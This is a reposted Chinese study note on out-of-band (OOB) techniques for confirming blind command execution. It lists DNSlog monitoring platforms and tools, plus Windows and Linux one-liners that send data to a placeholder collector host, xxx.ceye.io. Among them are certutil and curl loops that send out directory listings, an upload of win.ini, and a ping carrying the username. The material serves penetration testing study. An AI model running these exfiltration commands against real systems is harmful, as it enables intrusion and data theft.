日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

学习笔记-OOB

發布時間:2023/12/20 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 学习笔记-OOB 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

OOB

免責聲明

本文檔僅供學習和研究使用,請勿使用文中的技術源碼用于非法用途,任何人造成的任何負面影響,與本人無關.

相關文章

  • 帶外通道技術(OOB)總結
  • OOB(out of band)分析系列之DNS滲漏
  • Burpsuite之BurpCollaborator模塊介紹
  • Persistent Access to Burp Suite Sessions - Step-by-Step Guide
  • Burp Collaborator
  • HTTP BLIND
  • Cracking the lens: targeting HTTP's hidden attack-surface
  • System Hardening? ?? RCE? ???? ?? OOB ???
  • ping 命令跨平臺探測無回顯 RCE 技巧

在線監控平臺

  • http://ceye.io/
  • https://webhook.site
  • http://www.dnslog.cn/
  • https://iplogger.org/
  • https://log.咕.com/

相關工具

  • uknowsec/SharpNetCheck - 該工具可以在 dnslog 中回顯內網 ip 地址和計算機名,可實現內網中的快速定位可出網機器
  • ztgrace/mole - 識別和利用out-of-band (OOB)漏洞的burp擴展

平臺搭建

  • 十分鐘快速自建DNSlog服務器
  • DNSLOG的快速搭建攻略
  • 安全技術|DNSLOG平臺搭建從0到1
  • 自建DNSLog平臺
  • 快速搭建自用dnslog

平臺

  • BugScanTeam/DNSLog - DNSLog 是一款監控 DNS 解析記錄和 HTTP 訪問記錄的工具
  • lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 編寫的監控 DNS 解析記錄的工具,自帶 WEB 界面
  • chennqqi/godnslogdocker pull "sort/godnslog" docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100 # yourdomain.com 替換為你的域名 100.100.100.100 替換為你的公網IP
  • yumusb/DNSLog-Platform-Golang - DNSLOG平臺 golang 一鍵啟動版
  • phith0n/conote-community - Conote 綜合安全測試平臺社區版
  • projectdiscovery/interactsh - An OOB interaction gathering server and client library
  • Buzz2d0/Hyuga - 一個用來檢測帶外(Out-of-Band)流量(DNS查詢和HTTP請求)的監控工具
  • AbelChe/cola_dnslog
  • AlphabugX/Alphalog
  • Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.

Windows

  • ping

    ping %USERNAME%.xxx.ceye.ioping -nc 4 %USERNAME%.xxx.ceye.io

  • certutil

    使用 certutil 請求證書文件,并將下載文件重定向到 nul,無緩存、無需瀏覽器實現發起 http 請求

    for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul

  • curl

    windows 環境默認是支持 curl 的

    for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%xcurl -F file=@C:\windows\win.ini http://xxx.ceye.io

linux

  • curl

    curl http://xxx.ceye.io/%x

  • wget

    wget http://xxx.ceye.io/%x

  • ping

    linux 默認 ping 不帶 -c 參數是會導致無限ping下去的,一定要帶 -c

    ping -c 4 xxx.ceye.ioping -nc 4 xxx.ceye.io

  • openssl

    openssl s_client -connect xxx.ceye.io:80

  • nc

    echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80

  • dig

    dig xxx.ceye.io

點擊關注,共同學習!安全狗的自我修養

github haidragon

https://github.com/haidragon

總結

以上是生活随笔為你收集整理的学习笔记-OOB的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。